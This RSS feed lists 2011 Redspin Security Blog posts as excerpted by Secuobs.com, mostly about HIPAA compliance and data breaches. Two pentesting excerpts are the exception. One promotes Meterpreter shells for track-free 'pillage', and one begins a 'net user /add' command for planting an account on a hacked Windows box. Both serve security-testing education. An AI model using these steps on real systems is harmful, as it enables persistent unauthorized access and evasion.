<item><title>The LuLz Boat has Sailed</title><description>Secuobs.com : 2011-06-27 18:32:13 - Redspin Security Blog - Over the weekend the Lulz Security guys called it quits. Their last release came on the 50th day since they started their escapades. It isn't clear if they had intended from the start to only exist for 50 days, but after DDoS'ing cia.gov they had escalated their wanted status to critical and it was likely ...</description><link>http://www.secuobs.com/revue/news/313811.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/313811.shtml</guid></item>
<item><title>International Monetary Fund Breach: mum's the word from the IMF</title><description>Secuobs.com : 2011-06-13 08:46:52 - Redspin Security Blog - The New York Times reported this weekend on a potentially serious breach at the International Monetary Fund (IMF). The Times reports that the breach occurred perhaps several months ago, yet the fund only disclosed this to internal staff and board members on Wednesday. Other than the report from the Times, there is not a lot of available ...</description><link>http://www.secuobs.com/revue/news/310758.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/310758.shtml</guid></item>
<item><title>Does a HIPAA Risk Analysis cover Certification of EHR Technology?</title><description>Secuobs.com : 2011-06-11 01:19:26 - Redspin Security Blog - To qualify for Meaningful Use an organization must use an approved EHR application. The standards that EHR technology must meet to be approved for Meaningful Use are defined in 45 CFR 170.302. We are often asked if our HIPAA Risk Analysis covers Certification of their EHR Technology to 45 CFR 170.302 (General certification criteria for ...</description><link>http://www.secuobs.com/revue/news/310562.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/310562.shtml</guid></item>
<item><title>RSA: More concerned with their revenue than your security?</title><description>Secuobs.com : 2011-06-09 18:54:11 - Redspin Security Blog - The RSA Breach, their initial reaction, and their follow-up communication regarding the Lockheed Martin attack (which they are admitting is related to the initial RSA breach) makes us question their priorities. Revenue and brand come first. Customer security is second. Of course both of these are inter-related; you surely can't build a robust security brand ...</description><link>http://www.secuobs.com/revue/news/310208.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/310208.shtml</guid></item>
<item><title>A "Sea Change" in HIPAA Security: Why Business Associates Should Be Pro-Active About Security Risk Now</title><description>Secuobs.com : 2011-06-09 07:14:58 - Redspin Security Blog - A recent report suggests that nearly 40% of data breaches of protected health information occur at third party companies entrusted by health care providers with sensitive data. A striking statistic, particularly since HIPAA and HITECH mandate that healthcare providers ensure privacy and security among such "business associates". While providers generally insist these obligations be included ...</description><link>http://www.secuobs.com/revue/news/310093.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/310093.shtml</guid></item>
<item><title>OIG's Review of CMS HIPAA Security Rule Oversight: What a Scathing Report Means For You</title><description>Secuobs.com : 2011-05-31 01:29:09 - Redspin Security Blog - The OIG (the Office of Inspector General, the audit arm of the Department of Health &amp; Human Services) recently released their report on the CMS's (Centers for Medicare &amp; Medicaid Services) oversight and enforcement regarding hospitals' HIPAA Security Rule implementation. In the scathing report, the OIG clearly characterizes the current regulatory compliance efforts by the ...</description><link>http://www.secuobs.com/revue/news/308035.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/308035.shtml</guid></item>
<item><title>Bank Account Takeover Fraud: Draft FFIEC Guidance</title><description>Secuobs.com : 2011-05-23 20:01:49 - Redspin Security Blog - Account takeover fraud remains a major problem for financial institutions and the small businesses that are impacted. The FBI recently warned about increased Wire Transfer Fraud to Chinese Companies. Typically the hackers compromise the workstation of an employee who has the ability to initiate wire-transfers. Once the user logs on to their online banking, the hackers steal the credentials ...</description><link>http://www.secuobs.com/revue/news/306624.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/306624.shtml</guid></item>
<item><title>HIPAA Security Risk Analysis: Compliance vs. Security</title><description>Secuobs.com : 2011-05-23 19:09:09 - Redspin Security Blog - Security vs. Compliance. As an independent provider of security assessments, we are keenly aware of the 2 primary drivers of an objective security assessment: security or compliance. Roughly, these two views of risk management can be thought of as follows. Security: For organizations in this camp, ensuring that ePHI is protected is mission critical ...</description><link>http://www.secuobs.com/revue/news/306600.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/306600.shtml</guid></item>
<item><title>Inspector General Takes ONC to Task Over Lack of General Security Controls</title><description>Secuobs.com : 2011-05-19 06:16:55 - Redspin Security Blog - We wouldn't be so bold as to say "I told you so," but for months Redspin has been publicly calling on the ONC to beef up the security controls and measures in the "meaningful use" EHR incentive plan, the Federal Strategic Health IT Plan, and the HIPAA Security Rule itself. In fact just two weeks ...</description><link>http://www.secuobs.com/revue/news/305766.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/305766.shtml</guid></item>
<item><title>Building Assurance through HIPAA Security, Washington DC, May 10th-11th</title><description>Secuobs.com : 2011-05-16 01:38:40 - Redspin Security Blog - Last Monday night, I boarded a "red-eye" flight from LAX to Dulles to attend the OCR/NIST HIPAA Security Conference. I landed at 6:15 AM, did a quick change into my business attire, grabbed some coffee, rented a car, and found my way to the Ronald Reagan Building at 1600 Pennsylvania Avenue, 3 blocks from The White ...</description><link>http://www.secuobs.com/revue/news/304941.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/304941.shtml</guid></item>
<item><title>Public Comments on The Federal Health IT Strategic Plan, 2011-2015</title><description>Secuobs.com : 2011-05-07 02:09:32 - Redspin Security Blog - One of the ONC's key responsibilities is to provide strategic leadership to the public and private sector. Mandated under the HITECH Act of 2009, the ONC must publish and update its strategic plan for improving healthcare through the use of information technology. The Federal Health IT Strategic Plan, 2011-2015, first released in draft form in ...</description><link>http://www.secuobs.com/revue/news/303199.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/303199.shtml</guid></item>
<item><title>Sony PSN Breach: How Bad Was Their Security? A Look Into Error Messages</title><description>Secuobs.com : 2011-05-06 19:53:01 - Redspin Security Blog - There is lots of buzz based on the congressional testimony on how lax the security was on the Sony PlayStation Network. Since there were no sources cited in the testimony, we wondered if there is publicly available info to corroborate that viewpoint. A bit of digging in some of the public forums turned up some interesting information ...</description><link>http://www.secuobs.com/revue/news/303151.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/303151.shtml</guid></item>
<item><title>How to Apply for Meaningful Use</title><description>Secuobs.com : 2011-05-05 22:42:23 - Redspin Security Blog - If you are an eligible hospital or eligible professional, then meaningful use incentives and qualifying for them is likely top on your mind. If you are a vendor of EHR technology, you have been working to get your software certified for meaningful use so your customers can qualify for the incentives. Many organizations are in the midst ...</description><link>http://www.secuobs.com/revue/news/302942.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/302942.shtml</guid></item>
<item><title>PCI DSS Merchant Levels: Tell me again, who needs a QSA?</title><description>Secuobs.com : 2011-05-02 21:58:42 - Redspin Security Blog - We regularly are asked to explain the PCI merchant levels to customers. The merchant levels are a pretty straightforward grouping of merchants by credit card transaction volume. Each of the card brands (Visa, Mastercard, American Express, Discover and JCB) list the transaction volumes for the different merchant levels on their websites. While all companies that store, ...</description><link>http://www.secuobs.com/revue/news/302097.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/302097.shtml</guid></item>
<item><title>PlayStation Network Hack: What You Don't Know Can Hurt You</title><description>Secuobs.com : 2011-05-01 18:55:07 - Redspin Security Blog - In a press conference late last week, Sony PlayStation Network executives confirmed that the recent hacking incident, which exposed personally identifiable information and credit card numbers of all or part of the user database, was an exploit of a known vulnerability, just not one known to Sony. The "external intrusion" has left 77 million ...</description><link>http://www.secuobs.com/revue/news/301873.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/301873.shtml</guid></item>
<item><title>Sony's PlayStation Network Hacked: Credit Card Data Likely Compromised</title><description>Secuobs.com : 2011-04-27 08:24:48 - Redspin Security Blog - Sony's PlayStation Network (PSN) online gaming network has been compromised in what Sony is calling an "illegal and unauthorized intrusion". Some 77 million users subscribe to this service and it sounds like they've all had their information stolen. Information about PSN subscribers that Sony has confirmed to have been compromised includes: Name, Address, Country, Email ...</description><link>http://www.secuobs.com/revue/news/301039.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/301039.shtml</guid></item>
<item><title>HIPAA Security Risk Analysis: How to Achieve both Security and Compliance</title><description>Secuobs.com : 2011-04-26 17:24:07 - Redspin Security Blog - Let's review different viewpoints driving why healthcare organizations implement a HIPAA Security Risk Analysis. The purpose of exploring these different perspectives is to show that the primary objectives for doing a HIPAA Security Risk Analysis can be categorically defined as either security or compliance, and that both of these objectives can be achieved if ...</description><link>http://www.secuobs.com/revue/news/300851.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/300851.shtml</guid></item>
<item><title>Preparing for a HIPAA Security Risk Analysis: ePHI and Critical Applications</title><description>Secuobs.com : 2011-04-19 19:51:01 - Redspin Security Blog - We are often asked: "How do we prepare for a HIPAA Security Risk Analysis?" The short answer is: "It's easy." It's actually better to be under-prepared than to delay the process in the hopes of having your IT environment stabilized and your documentation completed; both are dynamic, always in flux and will never be ...</description><link>http://www.secuobs.com/revue/news/299466.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/299466.shtml</guid></item>
<item><title>Exporting GPOs Via the Commandline</title><description>Secuobs.com : 2011-04-15 02:08:11 - Redspin Security Blog - As security guys (and Linux/GNU fanboys), we tend to do absolutely everything possible via the commandline. This is pretty easy in Linux/Unix OSes, but unfortunately we deal with a lot of Windows boxes in our line of work, where it is less than easy at times. One common scenario we need to undertake is exporting ...</description><link>http://www.secuobs.com/revue/news/298584.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/298584.shtml</guid></item>
<item><title>MidState Medical Center Breach: The Business Associate Loses PHI, The Covered Entity's in the news</title><description>Secuobs.com : 2011-04-09 16:03:43 - Redspin Security Blog - In another classic case of "the business associate is at fault, but the covered entity takes the rap," the latest breach disclosed by MidState Medical Center in Connecticut is a classic case. The breach itself is indicative of a pretty vanilla data-loss vector. While few details have been released, the hospital's own news release indicates ...</description><link>http://www.secuobs.com/revue/news/297301.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/297301.shtml</guid></item>
<item><title>RSA Breach: What it says about healthcare security strategy</title><description>Secuobs.com : 2011-04-06 18:35:00 - Redspin Security Blog - RSA's release of additional information about their security breach (impacting their SecurID multi-factor authentication system) highlights important elements of an information security program. These elements are particularly important in a healthcare IT environment. To understand why, let's first review a rough outline of some widely reported details of the RSA attack. Step 1: Attacker sends ...</description><link>http://www.secuobs.com/revue/news/296660.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/296660.shtml</guid></item>
<item><title>Epsilon Breach</title><description>Secuobs.com : 2011-04-05 16:11:07 - Redspin Security Blog - The latest big security breach to hit the news is an important reminder about a couple of key aspects of security. While few details are available as to the nature of the breach, some general security principles apply. Here are a couple that come to mind. The existence of a security control is not the ...</description><link>http://www.secuobs.com/revue/news/296331.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/296331.shtml</guid></item>
<item><title>A Primer on HITRUST, EHNAC, Meaningful Use, HITECH, and Their Relationship with the HIPAA Security Rule</title><description>Secuobs.com : 2011-04-05 00:23:49 - Redspin Security Blog - At the risk of over-simplifying the role each of these groups play in the healthcare industry, the essence is the same: different people trying to figure out the best way to securely use electronic protected health information (ePHI) and supporting technology. However, without a single, industry-developed and accepted approach to securing ePHI, we ...</description><link>http://www.secuobs.com/revue/news/296198.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/296198.shtml</guid></item>
<item><title>To audit or not to audit: If a BA is in violation of the HIPAA Security Rule and no one knows, does it matter?</title><description>Secuobs.com : 2011-04-01 17:31:34 - Redspin Security Blog - There has been some debate as to the extent that a covered entity (CE) should audit a business associate (BA) to ensure that they are compliant with the HIPAA Security Rule and adequately safeguarding customer PHI. While I don't offer up the answer to that question, I thought it made sense to explore some of the ...</description><link>http://www.secuobs.com/revue/news/295702.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/295702.shtml</guid></item>
<item><title>The Federal Health IT Strategic Plan and the Final Four</title><description>Secuobs.com : 2011-03-28 20:51:40 - Redspin Security Blog - I just finished reading the ONC's (Office of the National Coordinator for Health Information Technology) draft document, The Federal Health IT Strategic Plan (the Plan), while watching the Butler-Florida game in the quarterfinals of the 2011 NCAA Championships. One of the ONC's key responsibilities is to provide strategic leadership to the public and private sector. Mandated ...</description><link>http://www.secuobs.com/revue/news/294625.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/294625.shtml</guid></item>
<item><title>RSA Breach: What Can Be Learned</title><description>Secuobs.com : 2011-03-20 16:30:14 - Redspin Security Blog - It's big news that RSA's infrastructure around their SecurID solution has been compromised. While information around this attack and its impact on customers is lacking (RSA is citing an ongoing investigation as a reason to limit public disclosure), a couple of lessons about general security management can be learned. The first lesson is around vendor ...</description><link>http://www.secuobs.com/revue/news/292918.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/292918.shtml</guid></item>
<item><title>A "Reasonable" Approach to HIPAA Risk Analysis</title><description>Secuobs.com : 2011-03-17 17:28:05 - Redspin Security Blog - The Office of Civil Rights (OCR) is responsible for issuing annual guidance on the provisions in the HIPAA Security Rule (45 CFR §§ 164.302-318). But with so much recent interest in IT security driven by the "meaningful use" incentive program, we want to share some of our observations and perspectives from recent Redspin client ...</description><link>http://www.secuobs.com/revue/news/292347.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/292347.shtml</guid></item>
<item><title>Get a Meterpreter Shell Using SMB Credentials</title><description>Secuobs.com : 2011-03-15 18:21:32 - Redspin Security Blog - The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks. I find myself using it fairly frequently against Windows machines that I've already gotten credentials ...</description><link>http://www.secuobs.com/revue/news/291770.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/291770.shtml</guid></item>
<item><title>HIPAA Enforcement Training for State Attorneys General: Is this a good thing or bad?</title><description>Secuobs.com : 2011-03-10 22:07:43 - Redspin Security Blog - I received an email notification about State Attorneys General HIPAA enforcement training posted by Joseph Conn at ModernHealthcare.com. The HITECH Act gave authority for state attorneys general to bring civil actions to obtain monetary damages for residents in their state for HIPAA Security Rule and Privacy Rule. What might it mean that the Office of Civil Rights ...</description><link>http://www.secuobs.com/revue/news/290814.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/290814.shtml</guid></item>
<item><title>A Systematic Approach to Managing Business Associate Risk</title><description>Secuobs.com : 2011-03-09 21:56:53 - Redspin Security Blog - Here we discuss the need for, and an approach for developing, a structured Business Associate oversight program for data security risk management. HIPAA and the HITECH Act have highlighted the importance of Business Associate (BA) security. Covered Entities (CEs) need to effectively manage Business Associates' security risk, and BAs need to understand their compliance requirements ...</description><link>http://www.secuobs.com/revue/news/290545.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/290545.shtml</guid></item>
<item><title>Charleston Area Medical Center (CAMC) Data Breach: What Can Be Learned?</title><description>Secuobs.com : 2011-03-08 16:25:42 - Redspin Security Blog - It's always educational to review a data security breach to see what can be learned. In the case of the Charleston Area Medical Center (CAMC) last month, a number of lessons can be learned. First let's review what we know (and don't know) about the data breach, which happened at CAMC subsidiary CAMC Health Education ...</description><link>http://www.secuobs.com/revue/news/290156.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/290156.shtml</guid></item>
<item><title>Managing HIPAA/HITECH Act Risk in the ePHI Supply Chain</title><description>Secuobs.com : 2011-03-07 18:07:47 - Redspin Security Blog - HITECH and the notice of proposed rule making (NPRM) published in the Federal Register July 14, 2010 significantly impact how Covered Entities (CEs) and Business Associates (BAs) manage health IT security risk under HIPAA. It has, in effect, created an ePHI supply chain in which everyone on the chain needs to worry about the security ...</description><link>http://www.secuobs.com/revue/news/289910.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/289910.shtml</guid></item>
<item><title>Managing Windows User Accounts via the Commandline</title><description>Secuobs.com : 2011-03-03 20:43:15 - Redspin Security Blog - Just hacked a box on a penetration test but can't get a Meterpreter shell on it for some reason? Add yourself a new account quickly with these easy commands. Works on all current versions of Windows (assuming you've got an admin-level account). Add local account of goat with password of T styHay: net user /add goat ...</description><link>http://www.secuobs.com/revue/news/289210.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/289210.shtml</guid></item>
<item><title>Report on Data Privacy and Security in Health Care Industry</title><description>Secuobs.com : 2011-03-01 01:17:39 - Redspin Security Blog - A report recently released by Deloitte performs a nice literature review including industry white papers and surveys, congressional testimony, and related journals. Interesting results include: 71% of HHS-reported information breaches are from Health Care Providers. The impact of a data breach over a two-year period is approximately $2 million per organization, and the lifetime value ...</description><link>http://www.secuobs.com/revue/news/288333.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/288333.shtml</guid></item>
<item><title>Increased Penalties for Healthcare Privacy and Security Violations: Batten Down the Hatches!</title><description>Secuobs.com : 2011-02-23 16:32:56 - Redspin Security Blog - The 2009 HITECH Act authorized the Health and Human Services Office for Civil Rights (HHS OCR) to add teeth to existing security and privacy regulations, and they've obviously taken the responsibility seriously. On the same day that HHS OCR imposed a whopping $4.3 million fine on Maryland-based Cignet Health for violating a provision of ...</description><link>http://www.secuobs.com/revue/news/287178.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/287178.shtml</guid></item>
<item><title>8 "Simple" Rules for Protecting PHI</title><description>Secuobs.com : 2011-02-20 05:06:06 - Redspin Security Blog - In the popular TV series "8 Simple Rules for Dating My Teenage Daughter," the rules may have been a bit exaggerated but they sure made their point (Rule #1: Use your hands on my daughter and you'll lose them after). Likewise, my "8 Simple Rules for Protecting PHI" strike a similar chord, no threats ...</description><link>http://www.secuobs.com/revue/news/286474.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/286474.shtml</guid></item>
<item><title>Correction 8 million and counting</title><description>Secuobs.com : 2011-02-18 22:02:21 - Redspin Security Blog - Since our 2010 Protected Health Information Breach Report was released, we have been asked a lot about trends in the industry Well, just in the last couple weeks, a number of breaches have been released that occurred at the end of 2010 This includes 16 incidents, over half the result of theft and involving some    </description><link>http://www.secuobs.com/revue/news/286313.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/286313.shtml</guid></item>
<item><title>Practical Business Associate Risk Management</title><description>Secuobs.com : 2011-02-15 00:31:43 - Redspin Security Blog - As any reasonably sized covered entity will attest, it is not unusual to have hundreds of Business Associates  partners who have access to ePHI  While your own security may be adequate to protect your ePHI, a breach by a Business Associate will result in substantial impact and the data breach is required to be disclosed    </description><link>http://www.secuobs.com/revue/news/285215.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/285215.shtml</guid></item>
<item><title>6 Million and Counting</title><description>Secuobs.com : 2011-02-09 20:33:05 - Redspin Security Blog - Redspin just released their annual report of protected health information breaches that occurred from late 2009 through the end of 2010 Over 200 breaches affecting 6,067,751 individuals have been recorded since August 2009 when the interim final breach notification regulation was issued as part of the Health Information Technology for Economic and Clinical Health  HITECH     </description><link>http://www.secuobs.com/revue/news/284075.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/284075.shtml</guid></item>
<item><title>Nasdaq Breach   What is says about what a company says about their security</title><description>Secuobs.com : 2011-02-06 17:12:28 - Redspin Security Blog - The breach on Nasdaq s Directors Desk application provides an interesting opportunity to analyze their actual state of security with their advertised state of security According to the Directors Desk website   Directors Desk has taken extreme measures to protect user information against unauthorized access  Given the confidential nature of public company board meetings   what they    </description><link>http://www.secuobs.com/revue/news/283273.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/283273.shtml</guid></item>
<item><title>Nasdaq Systems Breached</title><description>Secuobs.com : 2011-02-06 08:36:39 - Redspin Security Blog - Nasdaq has acknowledged that suspicious files were found on some of its systems. The files were apparently a result of hackers gaining access to at least one of their servers.</description><link>http://www.secuobs.com/revue/news/283254.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/283254.shtml</guid></item>
<item><title>Disable Storage of the LM Hash</title><description>Secuobs.com : 2011-02-02 03:33:37 - Redspin Security Blog - The LM hash is a horrifying relic left over from the dark ages of Windows 95. Also known as the LanMan, or LAN Manager hash, it is enabled by default on all Windows client and server versions up to Windows Server 2008 where it was finally turned off by default (thank you Microsoft). So what's</description><link>http://www.secuobs.com/revue/news/282320.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/282320.shtml</guid></item>
<item><title>Managing Business Associate Risk under HIPAA and HITECH</title><description>Secuobs.com : 2011-01-31 19:26:03 - Redspin Security Blog - The bar has been raised on how covered entities manage Business Associates (BAs): the HITECH Act breach notification requirements, penalties for electronic protected health information (ePHI) disclosure, and the expectation that Business Associates be compliant with the HIPAA Security Rule mean that covered entities need to ensure proper due-diligence when managing BAs. In a perfect</description><link>http://www.secuobs.com/revue/news/281916.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/281916.shtml</guid></item>
<item><title>Healthcare Web Applications: The Security Achilles Heel (Part 2)</title><description>Secuobs.com : 2011-01-28 02:38:15 - Redspin Security Blog - Last June, one of my colleagues at Redspin blogged about his concern that security flaws in software applications that house ePHI (electronic protected health information) represent a big threat. We had just completed a security assessment for a client and had found it relatively easy to access their customer portal using a common SQL injection</description><link>http://www.secuobs.com/revue/news/281319.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/281319.shtml</guid></item>
<item><title>Design and Security</title><description>Secuobs.com : 2011-01-27 22:50:03 - Redspin Security Blog - Why is Apple successful? Design. I don't mean they make great looking hardware. I also don't mean they make great looking software. Design is much more than looks. Donald Norman's The Design of Everyday Things goes into detail about how good design is more about usability than looks. In good design, everything just works. Why</description><link>http://www.secuobs.com/revue/news/281259.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/281259.shtml</guid></item>
<item><title>A Light in the Dark for EMR</title><description>Secuobs.com : 2011-01-25 23:50:37 - Redspin Security Blog - The top complaint I hear about healthcare IT systems when talking with clients is lack of interoperability. Once you pick one vendor for one system, you pretty much have to stick with them for everything. If you want information from one department or system to work with another department or system, everything has to come</description><link>http://www.secuobs.com/revue/news/280729.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/280729.shtml</guid></item>
<item><title>The Weakest Links</title><description>Secuobs.com : 2011-01-25 19:58:49 - Redspin Security Blog - I remember back in the day when I was reading "The Art of Deception" by Kevin Mitnick in which he said "...the social engineer is able to take advantage of people to obtain information with or without the use of technology". We all know the reasons as to why someone would want to social</description><link>http://www.secuobs.com/revue/news/280682.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/280682.shtml</guid></item>
<item><title>Unreal Repeal: Healthcare Reform and HITECH</title><description>Secuobs.com : 2011-01-24 21:08:32 - Redspin Security Blog - Last Wednesday, Republicans in the House of Representatives (and 3 Democrats) voted to repeal the health-care reforms signed into law by President Obama less than 1 year ago. Although the 245-189 vote made good on a GOP mid-term election promise, it was largely symbolic. The Senate is not likely to consider (much less pass) the bill,</description><link>http://www.secuobs.com/revue/news/280407.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/280407.shtml</guid></item>
<item><title>Getting Started With Corporate iPad and iPhone Mobile Security</title><description>Secuobs.com : 2011-01-21 22:03:31 - Redspin Security Blog - Mobile devices like the iPhone and iPad are a top security concern for 2011. The first step to addressing this risk is to put a security policy in place that addresses mobile devices. We recently released a free Mobile Security Policy template to help folks get started. If you don't have a mobile security policy</description><link>http://www.secuobs.com/revue/news/279989.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/279989.shtml</guid></item>
<item><title>How do you really know if your Business Associate is adequately protecting your ePHI?</title><description>Secuobs.com : 2011-01-20 23:48:40 - Redspin Security Blog - The HIPAA Security Rule now applies to Business Associates. We anxiously await the final modifications due to be released in March. However, the problem is your Business Associates have access to your ePHI right now. There really is no time to wait for the auditing requirements in the HITECH Act to be further defined</description><link>http://www.secuobs.com/revue/news/279741.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/279741.shtml</guid></item>
<item><title>Twitter Stems Growth of Fast-Spreading Worm</title><description>Secuobs.com : 2011-01-20 23:48:40 - Redspin Security Blog - Twitter feeds have been abuzz with talk of the latest Twitter worm that lures victims into a "scareware" page telling them they have a virus, only to subsequently infect them with real malware. Twitter engineers have done a stellar job reducing the spread of the malware from thousands of results this morning to none this</description><link>http://www.secuobs.com/revue/news/279740.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/279740.shtml</guid></item>
<item><title>Business Associates: The HITECH Act requires BAs to be compliant with the HIPAA Security Rule, that's a good thing</title><description>Secuobs.com : 2011-01-17 22:07:17 - Redspin Security Blog - Managing vendors and business partners is hard in any industry, but when the data is sensitive ePHI, you are trying to achieve EHR meaningful use and there are penalties like the HITECH Act's breach notification requirements, it can be even more daunting. Fortunately, one aspect of the HITECH Act can minimize security risk and facilitate managing</description><link>http://www.secuobs.com/revue/news/278775.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/278775.shtml</guid></item>
<item><title>Is It Time for Passwords to Go Away?</title><description>Secuobs.com : 2011-01-14 21:27:41 - Redspin Security Blog - It seems all too often my friends are having their accounts hacked. I get emails from them trying to hawk iPads or Facebook messages about Lady Gaga. There are three problems I see here: 1. Users choose poor passwords. This was shown in the recent Gawker hacks and pretty much every other username/password database breach in</description><link>http://www.secuobs.com/revue/news/278342.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/278342.shtml</guid></item>
<item><title>REDSPIN CHIMES IN ON MEANINGFUL USE</title><description>Secuobs.com : 2011-01-14 21:27:41 - Redspin Security Blog - A few days ago, members of the College of Healthcare Information Management Executives (CHIME) testified before a federal panel in Washington, DC. The hearing was entitled "Real World Experience Working with Meaningful Use". The panel consisted of members of the Implementation Workgroup of the HIT Standards Committee, who in turn report to David Blumenthal, MD,</description><link>http://www.secuobs.com/revue/news/278341.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/278341.shtml</guid></item>
<item><title>Use an SSH Tunnel to Safely Browse the Internet While on the Go</title><description>Secuobs.com : 2011-01-13 19:17:42 - Redspin Security Blog - It's a common scenario: you're on the road, in an airport, at a hotel, at a coffee shop, at a hacker con, any number of locations, and you need access to the Internet. There is generally WiFi at all of these locations. Some charge, some are free, but</description><link>http://www.secuobs.com/revue/news/278033.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/278033.shtml</guid></item>
<item><title>Penetration Testing IPV6 Networks</title><description>Secuobs.com : 2011-01-12 19:52:32 - Redspin Security Blog - The rumors of IPV4's demise and the impending move to IPV6 have been going around for the last fifteen years. IPV4 defines an address in numerical format such as 209.85.143.104. With the growth in the number of systems, the folks allocating addresses (ARIN) realized that we were going to run</description><link>http://www.secuobs.com/revue/news/277792.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/277792.shtml</guid></item>
<item><title>PCI DSS 2.0 Released: What Does It Mean For You?</title><description>Secuobs.com : 2011-01-11 23:24:23 - Redspin Security Blog - Version 2.0 of the PCI DSS has clarified their testing expectations by requiring 1) external vulnerability scanning by an ASV quarterly as well as scanning following any significant change (can be performed by internal staff), 2) internal vulnerability scanning quarterly and after significant changes by qualified and independent internal staff or third-parties, 3) annual external</description><link>http://www.secuobs.com/revue/news/277512.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/277512.shtml</guid></item>
<item><title>The Top 10 Coast-to-Coast</title><description>Secuobs.com : 2011-01-11 23:24:23 - Redspin Security Blog - On January 4th, Kroll, a worldwide risk consultancy firm headquartered in New York, released their "top 10 data security issues for 2011". Two days later, we published Redspin's "top 10 security issues for 2011" (I promise, we didn't read their version first). So aside from the coincidence, it's the differences between</description><link>http://www.secuobs.com/revue/news/277511.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/277511.shtml</guid></item>
<item><title>IBM.com Developer Portal Defaced</title><description>Secuobs.com : 2011-01-10 19:18:48 - Redspin Security Blog - The IBM.com developer portal was defaced early Sunday morning by a group of Indonesian hackers calling themselves Hmei7. Although the vulnerability exploited by the hackers is still unknown, Hmei7 differentiates itself from other groups by releasing tools to the underground hacking community. The tools page listed in some of the very numerous group defacements includes a variety of web application</description><link>http://www.secuobs.com/revue/news/277165.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/277165.shtml</guid></item>
<item><title>HIPAA / HITECH Act: A Practical Approach to Meaningful Use Risk Analysis</title><description>Secuobs.com : 2011-01-10 19:18:48 - Redspin Security Blog - With the federal EHR incentive program kicking off, is your organization scrambling to achieve meaningful use criteria for your EHR systems? Given all the questions we've been hearing about how healthcare organizations can effectively address the meaningful use requirements, I thought I would share a practical approach to addressing the core objective: protect electronic health information. In</description><link>http://www.secuobs.com/revue/news/277164.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/277164.shtml</guid></item>
<item><title>Lessons Learned From The BP Well Blowout For Your Industry</title><description>Secuobs.com : 2011-01-08 01:18:41 - Redspin Security Blog - In advance of the much anticipated full report due on January 11th from the National Commission on the BP Deepwater Horizon Oil Spill and Offshore Drilling, a chapter was recently released outlining some key findings that are relevant not only to the oil industry but also every other enterprise. Low, Low, High. The well blew</description><link>http://www.secuobs.com/revue/news/276740.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/276740.shtml</guid></item>
<item><title>Understanding the Experian Independent Third Party Assessment (EI3PA) Requirements</title><description>Secuobs.com : 2011-01-07 22:01:30 - Redspin Security Blog - We frequently are asked about the Experian Independent Third Party Assessment (EI3PA). The EI3PA is the Experian assessment requirements they impose on third parties that have access to credit history information. Not much of the documentation is publicly available, so we thought we would share our insights based on our experience and reviewing the</description><link>http://www.secuobs.com/revue/news/276669.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/276669.shtml</guid></item>
